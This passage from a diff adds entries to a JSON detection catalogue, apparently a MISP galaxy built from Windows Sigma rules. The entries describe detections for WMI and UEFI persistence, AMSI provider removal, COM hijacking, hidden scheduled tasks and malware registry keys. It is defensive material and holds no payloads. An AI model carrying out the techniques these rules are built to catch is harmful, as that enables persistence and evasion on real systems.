+ "uuid": "68bcd73b-37ef-49cb-95fc-edc809730be6",
+ "value": "WMIC Unquoted Services Path Lookup",
+ "meta": {
+ "refs": [
+ "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py",
+ "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1",
+ "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_unquoted_service_search.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1047"
+ ],
+ "creation_date": "2022/06/20",
+ "filename": "proc_creation_win_wmic_unquoted_service_search.yml",
+ "author": "Nasreddine Bencherchali",
+ "level": "medium",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects wmiprvse spawning processes",
+ "uuid": "d21374ff-f574-44a7-9998-4a8c8bf33d7d",
+ "value": "Wmiprvse Spawning Process",
+ "meta": {
+ "refs": [
+ "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190810201010.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmiprvse_spawning_process.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1047"
+ ],
+ "creation_date": "2019/08/15",
+ "filename": "proc_creation_win_wmiprvse_spawning_process.yml",
+ "author": "Roberto Rodriguez @Cyb3rWard0g",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event filters",
+ "uuid": "797011dc-44f4-4e6f-9f10-a8ceefbe566b",
+ "value": "WMI Backdoor Exchange Transport Agent",
+ "meta": {
+ "refs": [
+ 
"https://twitter.com/cglyer/status/1182389676876980224",
+ "https://twitter.com/cglyer/status/1182391019633029120",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1546.003"
+ ],
+ "creation_date": "2019/10/11",
+ "filename": "proc_creation_win_wmi_backdoor_exchange_transport_agent.yml",
+ "author": "Florian Roth",
+ "level": "critical",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects WMI script event consumers",
+ "uuid": "ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e",
+ "value": "WMI Persistence - Script Event Consumer",
+ "meta": {
+ "refs": [
+ "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.privilege_escalation",
+ "attack.t1546.003"
+ ],
+ "creation_date": "2018/03/07",
+ "filename": "proc_creation_win_wmi_persistence_script_event_consumer.yml",
+ "author": "Thomas Patzke",
+ "level": "medium",
+ "falsepositive": [
+ "Legitimate event consumers",
+ "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects WMI spawning a PowerShell process",
+ "uuid": "692f0bec-83ba-4d04-af7e-e884a96059b6",
+ "value": "WMI Spawning Windows PowerShell",
+ "meta": {
+ "refs": [
+ "https://any.run/report/68bc255f9b0db6a0d30a8f2dadfbee3256acfe12497bf93943bc1eab0735e45e/a2385d6f-34f7-403c-90d3-b1f9d2a90a5e",
+ 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmi_spwns_powershell.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1047",
+ "attack.t1059.001"
+ ],
+ "creation_date": "2019/04/03",
+ "filename": "proc_creation_win_wmi_spwns_powershell.yml",
+ "author": "Markus Neis / @Karneades",
+ "level": "high",
+ "falsepositive": [
+ "AppvClient",
+ "CCM"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.",
+ "uuid": "419dbf2b-8a9b-4bea-bf99-7544b050ec8d",
+ "value": "Microsoft Workflow Compiler",
+ "meta": {
+ "refs": [
+ "https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_workflow_compiler.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.execution",
+ "attack.t1127",
+ "attack.t1218"
+ ],
+ "creation_date": "2019/01/16",
+ "filename": "proc_creation_win_workflow_compiler.yml",
+ "author": "Nik Seetharaman, frack113",
+ "level": "high",
+ "falsepositive": [
+ "Legitimate MWC use (unlikely in modern enterprise environments)"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section",
+ "uuid": "4abc0ec4-db5a-412f-9632-26659cddf145",
+ "value": "UEFI Persistence Via Wpbbin - ProcessCreation",
+ "meta": {
+ "refs": [
+ "https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c",
+ 
"https://persistence-info.github.io/Data/wpbbin.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wpbbin_persistence.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.defense_evasion",
+ "attack.t1542.001"
+ ],
+ "creation_date": "2022/07/18",
+ "filename": "proc_creation_win_wpbbin_persistence.yml",
+ "author": "Nasreddine Bencherchali",
+ "level": "high",
+ "falsepositive": [
+ "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Looks for changes to registry to disable any write-protect property for storage devices. This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.",
+ "uuid": "75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13",
+ "value": "Write Protect For Storage Disabled",
+ "meta": {
+ "refs": [
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_write_protect_for_storage_disabled.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1562"
+ ],
+ "creation_date": "2021/06/11",
+ "filename": "proc_creation_win_write_protect_for_storage_disabled.yml",
+ "author": "Sreeman",
+ "level": "medium",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity",
+ "uuid": "2c28c248-7f50-417a-9186-a85b223010ee",
+ "value": "Wscript Shell Run In CommandLine",
+ "meta": {
+ "refs": [
+ "http://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wscript_shell_cli.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ 
"attack.t1059"
+ ],
+ "creation_date": "2022/08/31",
+ "filename": "proc_creation_win_wscript_shell_cli.yml",
+ "author": "Nasreddine Bencherchali",
+ "level": "high",
+ "falsepositive": [
+ "Rare legitimate inline scripting by some administrators"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)",
+ "uuid": "bdeeabc9-ff2a-4a51-be59-bb253aac7891",
+ "value": "Wsudo Suspicious Execution",
+ "meta": {
+ "refs": [
+ "https://github.com/M2Team/Privexec/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wsudo_susp_execution.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.privilege_escalation",
+ "attack.t1059"
+ ],
+ "creation_date": "2022/12/02",
+ "filename": "proc_creation_win_wsudo_susp_execution.yml",
+ "author": "Nasreddine Bencherchali",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument which is not longer supported. 
This could indicate an attacker using an old technique",
+ "uuid": "59b39960-5f9d-4a49-9cef-1e4d2c1d0cb9",
+ "value": "Wusa Extracting Cab Files",
+ "meta": {
+ "refs": [
+ "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wusa_susp_cab_extraction.yml"
+ ],
+ "tags": [
+ "attack.execution"
+ ],
+ "creation_date": "2022/08/04",
+ "filename": "proc_creation_win_wusa_susp_cab_extraction.yml",
+ "author": "Nasreddine Bencherchali",
+ "level": "medium",
+ "falsepositive": [
+ "The \"extract\" flag still works on older 'wusa.exe' versions, which could be a legitimate use (monitor the path of the cab being extracted)"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument from suspicious paths",
+ "uuid": "c74c0390-3e20-41fd-a69a-128f0275a5ea",
+ "value": "Wusa Extracting Cab Files From Suspicious Paths",
+ "meta": {
+ "refs": [
+ "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html",
+ "https://www.echotrail.io/insights/search/wusa.exe/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wusa_susp_cap_extraction_from_susp_paths.yml"
+ ],
+ "tags": [
+ "attack.execution"
+ ],
+ "creation_date": "2022/08/05",
+ "filename": "proc_creation_win_wusa_susp_cap_extraction_from_susp_paths.yml",
+ "author": "Nasreddine Bencherchali",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects suspicious use of 
XORDump process memory dumping utility",
+ "uuid": "66e563f9-1cbd-4a22-a957-d8b7c0f44372",
+ "value": "XORDump Use",
+ "meta": {
+ "refs": [
+ "https://github.com/audibleblink/xordump",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_xordump.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1036",
+ "attack.t1003.001"
+ ],
+ "creation_date": "2022/01/28",
+ "filename": "proc_creation_win_xordump.yml",
+ "author": "Florian Roth",
+ "level": "high",
+ "falsepositive": [
+ "Another tool that uses the command line switches of XORdump"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. Rule detects when adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.",
+ "uuid": "05c36dd6-79d6-4a9a-97da-3db20298ab2d",
+ "value": "XSL Script Processing",
+ "meta": {
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_xsl_script_processing.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1220"
+ ],
+ "creation_date": "2019/10/21",
+ "filename": "proc_creation_win_xsl_script_processing.yml",
+ "author": "Timur Zinniatullin, oscd.community",
+ "level": "medium",
+ "falsepositive": [
+ "WMIC.exe FP depend on scripts and administrative methods used in the monitored environment.",
+ "Msxsl.exe is not installed by default, so unlikely.",
+ "Static format arguments - https://petri.com/command-line-wmi-part-3"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Raw disk access using illegitimate tools, possible defence 
evasion", + "uuid": "db809f10-56ce-4420-8c86-d6a7d793c79c", + "value": "Raw Disk Access Using Illegitimate Tools", + "meta": { + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/raw_access_thread/raw_access_thread_disk_access_using_illegitimate_tools.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1006" + ], + "creation_date": "2019/10/22", + "filename": "raw_access_thread_disk_access_using_illegitimate_tools.yml", + "author": "Teymur Kheirkhabarov, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate Administrator using tool for raw access or ongoing forensic investigation" + ], + "logsource.category": "raw_access_thread", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an attacker registers a new AMSI provider in order to achieve persistence", + "uuid": "33efc23c-6ea2-4503-8cfe-bdf82ce8f705", + "value": "Persistence Via New AMSI Providers", + "meta": { + "refs": [ + "https://persistence-info.github.io/Data/amsi.html", + "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_amsi_providers_persistence.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/07/21", + "filename": "registry_add_amsi_providers_persistence.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Legitimate security products adding their own AMSI providers" + ], + "logsource.category": "registry_add", + "logsource.product": "windows" + } + }, + { + "description": "Detects creation of UserInitMprLogonScript persistence method", + "uuid": "9ace0707-b560-49b8-b6ca-5148b42f39fb", + "value": "Logon Scripts Creation in UserInitMprLogonScript Registry", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1037/", 
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.001/T1037.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_logon_scripts_userinitmprlogonscript_reg.yml" + ], + "tags": [ + "attack.t1037.001", + "attack.persistence", + "attack.lateral_movement" + ], + "creation_date": "2019/01/12", + "filename": "registry_add_logon_scripts_userinitmprlogonscript_reg.yml", + "author": "Tom Ueltschi (@c_APT_ure)", + "level": "high", + "falsepositive": [ + "Exclude legitimate logon scripts" + ], + "logsource.category": "registry_add", + "logsource.product": "windows" + } + }, + { + "description": "Attempts to detect registry events for common NetWire key HKCU\\Software\\NetWire", + "uuid": "1d218616-71b0-4c40-855b-9dbe75510f7f", + "value": "NetWire RAT Registry Key", + "meta": { + "refs": [ + "https://www.fortinet.com/blog/threat-research/new-netwire-rat-variant-spread-by-phishing", + "https://resources.infosecinstitute.com/topic/netwire-malware-what-it-is-how-it-works-and-how-to-prevent-it-malware-spotlight/", + "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/", + "https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line", + "https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_mal_netwire.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2021/10/07", + "filename": "registry_add_mal_netwire.yml", + "author": "Christopher Peacock", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_add", + "logsource.product": "windows" + } + }, + { + "description": "Detects new registry key created by Ursnif malware.", + "uuid": "21f17060-b282-4249-ade0-589ea3591558", + "value": "Ursnif", + "meta": { + "refs": [ + 
"https://blog.yoroi.company/research/ursnif-long-live-the-steganography/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_mal_ursnif.yml" + ], + "tags": [ + "attack.execution", + "attack.t1112" + ], + "creation_date": "2019/02/13", + "filename": "registry_add_mal_ursnif.yml", + "author": "megan201296", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_add", + "logsource.product": "windows" + } + }, + { + "description": "Detects COM object hijacking via TreatAs subkey", + "uuid": "9b0f8a61-91b2-464f-aceb-0527e0a45020", + "value": "Windows Registry Persistence COM Key Linking", + "meta": { + "refs": [ + "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_persistence_key_linking.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.015" + ], + "creation_date": "2019/10/23", + "filename": "registry_add_persistence_key_linking.yml", + "author": "Kutepov Anton, oscd.community", + "level": "medium", + "falsepositive": [ + "Maybe some system utilities in rare cases use linking keys for backward compatibility" + ], + "logsource.category": "registry_add", + "logsource.product": "windows" + } + }, + { + "description": "Detects the of the \"accepteula\" key related to sysinternals tools being created from non sysinternals tools", + "uuid": "f50f3c09-557d-492d-81db-9064a8d4e211", + "value": "Usage of Renamed Sysinternals Tools", + "meta": { + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_renamed_sysinternals_eula_accepted.yml" + ], + "tags": [ + "attack.resource_development", + 
"attack.t1588.002" + ], + "creation_date": "2022/08/24", + "filename": "registry_add_renamed_sysinternals_eula_accepted.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "registry_add", + "logsource.product": "windows" + } + }, + { + "description": "Detects the usage of Suspicious Sysinternals Tools such as PsExec, Procdump...etc via the \"accepteula\" key being added to Registry", + "uuid": "c7da8edc-49ae-45a2-9e61-9fd860e4e73d", + "value": "Usage of Suspicious Sysinternals Tools", + "meta": { + "refs": [ + "https://twitter.com/Moti_B/status/1008587936735035392", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_susp_sysinternals_eula_accepted.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588.002" + ], + "creation_date": "2022/08/24", + "filename": "registry_add_susp_sysinternals_eula_accepted.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate use of SysInternals tools" + ], + "logsource.category": "registry_add", + "logsource.product": "windows" + } + }, + { + "description": "Detects the usage of Sysinternals Tools due to accepteula key being added to Registry", + "uuid": "25ffa65d-76d8-4da5-a832-3f2b0136e133", + "value": "Usage of Sysinternals Tools - Registry", + "meta": { + "refs": [ + "https://twitter.com/Moti_B/status/1008587936735035392", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_sysinternals_eula_accepted.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588.002" + ], + "creation_date": "2017/08/28", + "filename": "registry_add_sysinternals_eula_accepted.yml", + "author": "Markus Neis", + "level": "low", + "falsepositive": [ + "Legitimate use of SysInternals tools", + "Programs that use the same Registry Key" + ], + "logsource.category": "registry_add", + "logsource.product": "windows" + } + }, 
+ { + "description": "A General detection to trigger for the creation or modification of .*\\Software\\Sysinternals\\SDelete registry keys. Indicators of the use of Sysinternals SDelete tool.", + "uuid": "9841b233-8df8-4ad7-9133-b0b4402a9014", + "value": "Sysinternals SDelete Registry Keys", + "meta": { + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/9", + "https://threathunterplaybook.com/evals/apt29/detections/4.B.2_59A9AC92-124D-4C4B-A6BF-3121C98677C3.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_sysinternals_sdelete_registry_keys.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ], + "creation_date": "2020/05/02", + "filename": "registry_add_sysinternals_sdelete_registry_keys.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_add", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence.\nThe disk cleanup manager is part of the operating system. 
It displays the dialog box [\u2026]\nThe user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", + "uuid": "d4f4e0be-cf12-439f-9e25-4e2cdcf7df5a", + "value": "Persistence Via Disk Cleanup Handler - NewEntry", + "meta": { + "refs": [ + "https://persistence-info.github.io/Data/diskcleanuphandler.html", + "https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_set_disk_cleanup_handler_new_entry_persistence.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/07/21", + "filename": "registry_set_disk_cleanup_handler_new_entry_persistence.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate new entry added by windows" + ], + "logsource.category": "registry_add", + "logsource.product": "windows" + } + }, + { + "description": "Detects the removal of folders from the \"ProtectedFolders\" list of of exploit guard. 
Which could indicate an attacker trying to launch an encryption process", + "uuid": "272e55a4-9e6b-4211-acb6-78f51f0b1b40", + "value": "Removal Of Folder From ProtectedFolders In Exploit Guard", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_exploit_guard_protected_folders.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/08/05", + "filename": "registry_delete_exploit_guard_protected_folders.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Legitimate administrators removing applications (should always be monitored)" + ], + "logsource.category": "registry_delete", + "logsource.product": "windows" + } + }, + { + "description": "Detects the deletion of registry keys containing the MSTSC connection history", + "uuid": "07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", + "value": "Terminal Server Client Connection History Cleared", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer", + "http://woshub.com/how-to-clear-rdp-connections-history/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_mstsc_history_cleared.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070", + "attack.t1112" + ], + "creation_date": "2021/10/19", + "filename": "registry_delete_mstsc_history_cleared.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_delete", + "logsource.product": "windows" + } + }, + { + "description": "Remove the AMSI Provider registry key in HKLM\\Software\\Microsoft\\AMSI to disable AMSI inspection", + "uuid": 
"41d1058a-aea7-4952-9293-29eaaf516465", + "value": "Removal Of Amsi Provider Reg Key", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://seclists.org/fulldisclosure/2020/Mar/45", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2021/06/07", + "filename": "registry_delete_removal_amsi_registry_key.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "registry_delete", + "logsource.product": "windows" + } + }, + { + "description": "A General detection to trigger for processes removing .*\\shell\\open\\command registry keys. Registry keys that might have been used for COM hijacking activities.", + "uuid": "96f697b0-b499-4e5d-9908-a67bec11cdb6", + "value": "Removal of Potential COM Hijacking Registry Keys", + "meta": { + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/7", + "https://threathunterplaybook.com/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.html", + "https://docs.microsoft.com/en-us/windows/win32/shell/launch", + "https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand", + "https://docs.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2020/05/02", + "filename": "registry_delete_removal_com_hijacking_registry_key.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "medium", + "falsepositive": [ + "Legitimate software (un)installations are known to cause 
some false positives. Please add them as a filter when encountered" + ], + "logsource.category": "registry_delete", + "logsource.product": "windows" + } + }, + { + "description": "Detects when the \"index\" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as \"schtasks /query\"", + "uuid": "526cc8bc-1cdc-48ad-8b26-f19bff969cec", + "value": "Removal Of Index Value to Hide Schedule Task", + "meta": { + "refs": [ + "https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_index_value_scheduled_task_hide.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ], + "creation_date": "2022/08/26", + "filename": "registry_delete_removal_index_value_scheduled_task_hide.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_delete", + "logsource.product": "windows" + } + }, + { + "description": "Remove SD (Security Descriptor) value in \\Schedule\\TaskCache\\Tree registry hive to hide schedule task. 
This technique is used by Tarrask malware", + "uuid": "acd74772-5f88-45c7-956b-6a7b36c294d2", + "value": "Removal Of SD Value to Hide Schedule Task", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_sd_value_scheduled_task_hide.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ], + "creation_date": "2022/04/15", + "filename": "registry_delete_removal_sd_value_scheduled_task_hide.yml", + "author": "Sittikorn S", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_delete", + "logsource.product": "windows" + } + }, + { + "description": "Sysmon registry detection of a local hidden user account.", + "uuid": "460479f3-80b7-42da-9c43-2cc1d54dbccd", + "value": "Creation of a Local Hidden User Account by Registry", + "meta": { + "refs": [ + "https://twitter.com/SBousseaden/status/1387530414185664538", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_add_local_hidden_user.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001" + ], + "creation_date": "2021/05/03", + "filename": "registry_event_add_local_hidden_user.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018", + "uuid": "7bdf2a7c-3acc-4091-9581-0a77dad1c5b5", + "value": "Chafer Activity - Registry", + "meta": { + "refs": [ + "https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_chafer_mar18.yml" + ], + "tags": [ + "attack.persistence", + 
"attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", + "attack.defense_evasion", + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" + ], + "creation_date": "2018/03/23", + "filename": "registry_event_apt_chafer_mar18.yml", + "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects registry key used by Leviathan APT in Malaysian focused campaign", + "uuid": "70d43542-cd2d-483c-8f30-f16b436fd7db", + "value": "Leviathan Registry Key Activity", + "meta": { + "refs": [ + "https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_leviathan.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2020/07/07", + "filename": "registry_event_apt_leviathan.yml", + "author": "Aidan Bracher", + "level": 